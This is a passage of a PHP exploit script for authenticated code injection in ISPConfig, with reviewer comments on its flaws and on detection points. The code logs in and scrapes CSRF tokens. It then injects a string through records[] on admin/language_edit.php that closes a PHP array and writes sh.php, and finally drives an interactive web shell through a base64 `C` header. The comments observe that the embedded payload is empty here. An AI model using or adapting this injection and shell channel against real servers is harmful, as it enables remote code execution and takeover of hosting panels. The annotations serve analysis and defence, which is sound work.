\n\n");
// NOTE(review): the fragment above is the tail of a statement that begins before this
// chunk (presumably a usage/die() message); the `<?php` opener and any argv count check
// are not visible here, so missing arguments would surface as undefined-offset notices.

// Positional CLI arguments: base URL (paths such as `login/` are appended directly, so it
// is assumed to end with '/'), username, password. No validation of any of them is visible.
list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];
// Credentials are echoed to stdout in clear text (and will land in any terminal log).
print "[+] Logging in with username '{$user}' and password '{$pass}'\n";

// Start from a fresh cookie jar in the working directory; `@` hides the warning when the
// file does not exist. The jar is never removed afterwards -- the session cookie persists
// on disk as a forensic artifact on the host running this script.
@unlink('./cookies.txt');

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "{$url}login/");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// TLS certificate verification is disabled: credentials and the session cookie are sent
// to whatever answers at $url, so an on-path interceptor sees both.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt');
// Form login; the username/password are URL-encoded, the fixed `s_mod=login` field is not.
curl_setopt($ch, CURLOPT_POSTFIELDS, "username=".urlencode($user)."&password=".urlencode($pass)."&s_mod=login");
// Login success is inferred only from the absence of this error string; any other failure
// mode (redirect, maintenance page, network error returning false) is treated as success.
if (preg_match('/Username or Password wrong/i', curl_exec($ch))) die("[-] Login failed!\n");

print "[+] Injecting shell\n";
// The payload is empty on this page: base64_encode("") is "", so the write below creates
// an empty sh.php. As given, the interactive loop further down can therefore never match
// its `____` markers and exits with "Exploit failed!" on the first command.
$__phpcode = base64_encode("");
// The value is written into a generated PHP language file as an array element; the leading
// `'];` closes that assignment so the rest is executed as code. Application-side fix is to
// never emit user-controlled keys/values into executable PHP (escape, or use a data format).
$injection = "'];file_put_contents('sh.php',base64_decode('{$__phpcode}'));die;#";
// A random 26-lowercase-letter .lng file name is created for the `help` module -- an
// audit artifact: an unexpected .lng file with such a name in the language directory.
$lang_file = str_shuffle("qwertyuioplkjhgfdsazxcvbnm").".lng";

// First request only fetches the edit form to scrape its CSRF tokens; an authenticated
// automated client defeats per-form CSRF tokens this way, so they are not a defense here.
curl_setopt($ch, CURLOPT_URL, "{$url}admin/language_edit.php");
curl_setopt($ch, CURLOPT_POSTFIELDS, "lang=en&module=help&lang_file={$lang_file}");
$res = curl_exec($ch);
if (!preg_match('/_csrf_id" value="([^"]+)"/i', $res, $csrf_id)) die("[-] CSRF ID not found!\n");
if (!preg_match('/_csrf_key" value="([^"]+)"/i', $res, $csrf_key)) die("[-] CSRF key not found!\n");
// `records[%5C]` is a record whose key is a single backslash. Detection point: a POST to
// admin/language_edit.php whose records[] key/value contain quote/bracket sequences.
curl_setopt($ch, CURLOPT_POSTFIELDS, "lang=en&module=help&lang_file={$lang_file}&_csrf_id={$csrf_id[1]}&_csrf_key={$csrf_key[1]}&records[%5C]=".urlencode($injection));
// Return value is ignored; no check that the write actually happened.
curl_exec($ch);

print "[+] Launching shell\n";
// Subsequent requests are GETs to the dropped file; the command travels in a non-standard
// request header named `C` (base64). Detection point: requests to admin/sh.php carrying
// such a header, and responses wrapped in `____` markers.
curl_setopt($ch, CURLOPT_URL, "{$url}admin/sh.php");
curl_setopt($ch, CURLOPT_POST, false);
while(1) {
    print "\nispconfig-shell# ";
    // NOTE(review): fgets(STDIN) returns false at EOF; trim(false) is "" which is not
    // "exit", so with a closed stdin this loop never ends and fires one request per pass.
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: ".base64_encode($cmd)]);
    // Prints the text between the markers, or aborts the whole script if they are absent
    // (so a single command with no output wrapper is fatal, not retried).
    preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}